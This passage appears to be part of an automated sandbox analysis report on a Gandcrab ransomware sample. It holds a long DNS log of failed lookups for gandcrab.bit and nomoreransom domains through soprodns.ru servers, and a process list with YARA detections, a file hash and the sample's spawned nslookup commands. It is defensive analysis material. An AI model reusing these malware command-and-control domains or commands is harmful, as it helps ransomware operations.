Aug 31, 2022 23:59:18.240111113 CEST | 8.8.8.8 | 192.168.2.3 | 0x160b | Name error (3) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:18.268676043 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:59:18.286752939 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | nomoreransom.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:18.304971933 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | nomoreransom.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:18.325037003 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | nomoreransom.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:18.345073938 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | nomoreransom.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:18.697067022 CEST | 8.8.8.8 | 192.168.2.3 | 0x160b | Name error (3) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:20.690124035 CEST | 8.8.8.8 | 192.168.2.3 | 0x9891 | Name error (3) | dns1.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:20.719475031 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:59:20.740108013 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | gandcrab.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:20.757486105 CEST | 8.8.8.8 | 192.168.2.3 | 0x9891 | Name error (3) | dns1.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:20.760489941 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | gandcrab.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:20.779664040 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | gandcrab.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:20.799532890 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | gandcrab.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:22.145498037 CEST | 8.8.8.8 | 192.168.2.3 | 0xc448 | Name error (3) | dns1.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:22.173274994 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:59:22.191287994 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | nomoreransom.coin | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:22.215575933 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | nomoreransom.coin | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:22.235313892 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | nomoreransom.coin | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:22.255491972 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | nomoreransom.coin | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:24.179404020 CEST | 8.8.8.8 | 192.168.2.3 | 0x9641 | Name error (3) | dns1.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:24.206090927 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:59:24.226692915 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | nomoreransom.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:24.245124102 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | nomoreransom.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:24.265338898 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | nomoreransom.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:24.285284042 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | nomoreransom.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:27.165951967 CEST | 8.8.8.8 | 192.168.2.3 | 0x72c8 | Name error (3) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:27.189124107 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:59:27.209870100 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | gandcrab.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:27.267399073 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | gandcrab.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:27.286777020 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | gandcrab.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:27.307277918 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | gandcrab.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:27.705112934 CEST | 8.8.8.8 | 192.168.2.3 | 0x72c8 | Name error (3) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:30.836324930 CEST | 8.8.8.8 | 192.168.2.3 | 0xbe66 | Name error (3) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:30.862699986 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:59:30.884212971 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | nomoreransom.coin | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:30.904670000 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | nomoreransom.coin | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:30.922668934 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | nomoreransom.coin | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:30.942532063 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | nomoreransom.coin | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:32.146146059 CEST | 8.8.8.8 | 192.168.2.3 | 0xbe66 | Name error (3) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:32.299428940 CEST | 8.8.8.8 | 192.168.2.3 | 0xc8b1 | Name error (3) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:32.323093891 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:59:32.343451023 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | nomoreransom.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:32.364872932 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | nomoreransom.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:32.385454893 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | nomoreransom.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:32.415087938 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | nomoreransom.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:36.530746937 CEST | 8.8.8.8 | 192.168.2.3 | 0x6b6b | Name error (3) | dns1.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:36.563038111 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:59:36.583677053 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | gandcrab.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:36.602057934 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | gandcrab.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:36.620131016 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | gandcrab.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:36.640644073 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | gandcrab.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:36.792453051 CEST | 8.8.8.8 | 192.168.2.3 | 0x6b6b | Name error (3) | dns1.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:39.088445902 CEST | 8.8.8.8 | 192.168.2.3 | 0x6b6b | Name error (3) | dns1.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:39.439719915 CEST | 8.8.8.8 | 192.168.2.3 | 0xbe0f | Name error (3) | dns1.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:39.465456009 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:59:39.483722925 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | nomoreransom.coin | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:39.503002882 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | nomoreransom.coin | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:39.521054029 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | nomoreransom.coin | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:39.540900946 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | nomoreransom.coin | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:39.567404985 CEST | 8.8.8.8 | 192.168.2.3 | 0xbe0f | Name error (3) | dns1.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:40.827275038 CEST | 8.8.8.8 | 192.168.2.3 | 0x3976 | Name error (3) | dns1.soprodns.ru | none | none | A (IP address) | IN (0x0001)
                                      Aug 31, 2022 23:59:40.853662968 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:40.873889923 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:40.891818047 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:40.909749031 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:40.930310965 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:42.224383116 CEST8.8.8.8192.168.2.30x94a7Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:42.254621983 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:42.280628920 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:42.301055908 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:42.321456909 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:42.341794014 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:45.634243011 CEST8.8.8.8192.168.2.30x70aeName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:45.670564890 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:45.691019058 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:45.711270094 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:45.729429960 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:45.756819010 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:45.793020010 CEST8.8.8.8192.168.2.30x70aeName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:46.698057890 CEST8.8.8.8192.168.2.30x70aeName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:48.139800072 CEST8.8.8.8192.168.2.30xed4Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:48.167660952 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:48.188586950 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:48.209095001 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:48.238341093 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:48.259392023 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:48.697335958 CEST8.8.8.8192.168.2.30xed4Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:50.544496059 CEST8.8.8.8192.168.2.30xae84Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:50.575448990 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:50.592947006 CEST8.8.8.8192.168.2.30xae84Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:50.596391916 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:50.624696016 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:50.648333073 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:50.668668032 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:51.954930067 CEST8.8.8.8192.168.2.30x4be7Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:51.988468885 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:52.008342981 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:52.042766094 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:52.062791109 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:52.083273888 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:53.888886929 CEST8.8.8.8192.168.2.30x8b86Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:53.930005074 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:53.951704979 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:53.972112894 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:53.996426105 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:54.017124891 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:56.294773102 CEST8.8.8.8192.168.2.30x1e6dName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:56.322354078 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:56.342601061 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:56.360450983 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:56.380527020 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:56.400538921 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:56.951119900 CEST8.8.8.8192.168.2.30x1e6dName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:57.635045052 CEST8.8.8.8192.168.2.30x2252Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:57.666646004 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:57.687072039 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:57.705380917 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:57.725605011 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:57.745647907 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:59.852207899 CEST8.8.8.8192.168.2.30x82c8Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:59.877156019 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:59.898338079 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:59.918551922 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:59.938997030 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:59.959988117 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:02.071805954 CEST8.8.8.8192.168.2.30xb09Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:02.100327969 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Sep 1, 2022 00:00:02.120507956 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:02.141537905 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:02.160455942 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:02.179536104 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:02.700483084 CEST8.8.8.8192.168.2.30xb09Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:03.343596935 CEST8.8.8.8192.168.2.30xa990Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:03.370637894 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Sep 1, 2022 00:00:03.390731096 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:03.410953045 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:03.430705070 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:03.450587988 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:03.829907894 CEST8.8.8.8192.168.2.30x82c8Server failure (2)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:05.091319084 CEST8.8.8.8192.168.2.30x31aName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:05.118396044 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Sep 1, 2022 00:00:05.138398886 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:05.158288956 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:05.176443100 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:05.194662094 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:07.399528980 CEST8.8.8.8192.168.2.30xd96aName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:07.432984114 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Sep 1, 2022 00:00:07.454828024 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:07.479063988 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:07.501718998 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:07.524806976 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:07.918035030 CEST8.8.8.8192.168.2.30xd96aName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:09.840522051 CEST8.8.8.8192.168.2.30xa920Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:09.867008924 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Sep 1, 2022 00:00:09.887459040 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:09.910227060 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:09.933176994 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:09.956068039 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:11.285418034 CEST8.8.8.8192.168.2.30xa868Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:11.304387093 CEST8.8.8.8192.168.2.30xa920Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:11.310426950 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Sep 1, 2022 00:00:11.330421925 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:11.350558043 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:11.370852947 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:11.388839006 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)

                                      Target ID:1
                                      Start time:23:57:53
                                      Start date:31/08/2022
                                      Path:C:\Users\user\Desktop\gI5xZdIxUs.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\gI5xZdIxUs.exe"
                                      Imagebase:0xfc60000
                                      File size:101710 bytes
                                      MD5 hash:98A12EC721C098842FBFD7384D5A72AE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000001.00000000.272296797.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000001.00000000.272303387.000000000FC72000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      Reputation:low

                                      Target ID:5
                                      Start time:23:58:02
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.coin dns1.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Target ID:7
                                      Start time:23:58:03
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Target ID:11
                                      Start time:23:58:05
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.bit dns1.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Target ID:13
                                      Start time:23:58:06
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Target ID:14
                                      Start time:23:58:08
                                      Start date:31/08/2022
